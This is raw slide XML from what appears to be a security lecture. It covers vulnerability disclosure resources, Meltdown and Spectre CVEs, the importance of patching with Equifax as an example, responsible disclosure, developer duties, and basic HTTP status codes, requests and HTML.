      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12541623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B6ED91-5667-4AA7-85FF-E7B4E4F695A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555631" y="1441938"/>
            <a:ext cx="7080738" cy="3974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Lesson 4</a:t>
            </a:r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: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Awareness and Vigilance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3133972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F5689-22C1-4769-8174-1A6686E79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Vulnerability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A85B3-C140-4425-98FA-6FC758120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You can’t mitigate threats you don’t know</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>seclists.org has two of the most comprehensive mailing lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bugtraq</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full Disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common Vulnerabilities and Exposures (CVE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NIST National Vulnerability Database (NVD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds risk scores to CVE reports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Carnegie Mellon University CERT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214032-CB92-450F-BB52-BF080EDE9F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770" y="3955713"/>
            <a:ext cx="1428750" cy="6762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329D16-D1B2-4653-8D13-7DBCB03DF3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203" y="2142427"/>
            <a:ext cx="1708957" cy="91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31624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73378A-DDD9-4A8F-B6B7-6784F0FE05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439" y="0"/>
            <a:ext cx="9637121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E1ECCC7-85D6-40C7-BA8C-24EA96C7D647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1540516" y="4184619"/>
            <a:ext cx="6702597" cy="360355"/>
          </a:xfrm>
          <a:prstGeom prst="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91762A-4F53-4A9A-84B5-4A25E1DA5C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1540515" y="5742403"/>
            <a:ext cx="6702597" cy="360355"/>
          </a:xfrm>
          <a:prstGeom prst="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AC4E799E-F2A5-4AC2-8890-DF79D8225F8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7954811" y="1746668"/>
            <a:ext cx="3766299" cy="1583781"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40225"/>
              <a:gd name="adj2" fmla="val 1065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CVE-2017-5754 – Meltdown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CVE-2017-5753 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Spectre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> v1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CVE-2017-5715 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Spectre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> v2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200157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B6ED91-5667-4AA7-85FF-E7B4E4F695A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555631" y="1441938"/>
            <a:ext cx="7080738" cy="3974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Lesson 5</a:t>
            </a:r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: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Patch!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39067324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8649C-F04F-4B15-A14A-D7C04D88F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Vulnerabilities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CAF7D-2AEC-4178-BE2C-E34D9C487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038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0-day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vulnerabilities are a serious concern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploits for bugs that are undisclosed and unpatched</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very hard to detect and prevent attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extremely valuable for attackers and three letter agencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But most successful attacks involve old, patched vulnerabilities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Exploit kits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bundle common attacks together, automate breaches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usable by unsophisticated attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drive-by download attacks against browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Worms that target vulnerable web servers and service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scanners that looks for known SQL injection vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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281632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F03B7-C9AA-4F16-B4BE-7E2C39E0E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People Don’t Patch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D0433-DD4C-4957-838E-148E605B2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4562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Key problem: people don’t patch their systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many applications do not automatically update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System administrators delay patches to test compatibility with software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Users are unaware, don’t bother to look for security updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Equifax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initial breach leveraged a vulnerability in Apache Struts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CVE-2017-9805</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bug had been known and patch available for two months :(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CE4CF9-6B18-47D4-9DCB-EF1D3463B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369" y="5271247"/>
            <a:ext cx="9339331" cy="127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18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62F4E-2C5F-455C-999F-D5DCBCD49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Everybody Should Patch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CA16D-238B-48CD-964F-35C5E03EC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Use systems that automate updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google Play Store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iOS App Store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Aptitude (apt) and Red Hat Package Manager (rpm or yum)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chrome, Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid systems that do not automate or fail to update regularly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Android on most phones :(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most desktop software on Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Embedded devices (NATs, IoT, etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2643025767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CCCEF-CE89-49AA-BF78-86164DF32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Ticking Clock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034DA-DC1E-42E5-8817-C38FCA604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7923306" cy="4873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good: white hats often find and report vulnerabilities in private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Responsible Disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vender develops and distributes a patch…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before attackers know about the vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The bad: attackers reverse engineer patches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Figure out what vulnerabilities were patched</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Develop retrospective exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A race against time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Patches enable the development of new exploits!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Patches should be applied as soon as possible!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BAE8A9-6A6C-4C16-986D-FEB5225BF7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5" r="36693"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8396941" y="0"/>
            <a:ext cx="379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00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6EA33-7248-4FB5-9BD9-84ED18818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Responsibilities of Developers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9945B-DB05-4B7D-9E26-8F2DFDA74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If you develop software, you are responsible for the security of users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Important if you develop desktop software/apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even more important if you develop libraries for other developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commit to providing security and privacy for your users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Duty of care, virtue ethics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Define a security process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Email and website for people to submit vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider a bug bounty program (e.g. through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HackerOne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Post legal policies to indemnify security researchers acting in good faith</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mailing list to inform users about security issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Serious problems should be reported to Full Disclosure, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bugtraq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, CVE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Distribute patches in a timely manner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258763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Response Status Codes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3 digit response codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1XX – informational</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2XX – success</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3XX – redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>301 Moved Permanently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>303 Moved Temporarily</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>304 Not Modified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4XX – client error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>404 Not Found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5XX – server error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>505 HTTP Version Not Supported</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66145395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431"/>
            <a:ext cx="10515600" cy="934286"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sending Data Over HTTP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84203"/>
            <a:ext cx="10515600" cy="2060575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Four ways to send data to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Embedded in the URL (typically URL encoded, but not always)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In cookies (cookie encoded)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside a custom HTTP request header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the HTTP request body (form-encoded)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657727" y="3777916"/>
            <a:ext cx="10940716" cy="2959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056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7584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112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2640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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>purchase.html?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>cbw&amp;item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>iPad&amp;price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=399.99#shopping_cart HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>… other headers…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Cookie: user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>cbw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>; item=iPad; price=399.99;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>X-My-Header: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>cbw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/iPad/399.99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user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>cbw&amp;item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>iPad&amp;price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=399.99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7704440" y="4391527"/>
            <a:ext cx="489065" cy="357390"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60833"/>
              <a:gd name="adj2" fmla="val -1165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6413051" y="4748917"/>
            <a:ext cx="489065" cy="357390"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87894"/>
              <a:gd name="adj2" fmla="val -87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4989314" y="5149513"/>
            <a:ext cx="489065" cy="357390"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87894"/>
              <a:gd name="adj2" fmla="val -87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5478379" y="6110259"/>
            <a:ext cx="489065" cy="357390"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87894"/>
              <a:gd name="adj2" fmla="val -87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94524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Pages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719" y="1825625"/>
            <a:ext cx="522047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Multiple (typically small) objects per page </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., each image, JS, CSS, etc. downloaded separately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single page can have 100s of HTTP transactions!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common to mix objects from first- and third-party sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 357"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5816082" y="1519881"/>
            <a:ext cx="6127102" cy="46570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056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7584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112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2640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241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>doctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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&lt;head&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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lang="en-US" sz="18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&lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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    &lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4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lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>“../jquery.js”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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&lt;/head&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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sz="18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lang="en-US" sz="18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&lt;h1&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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Hello World</a:t>
            </a:r>
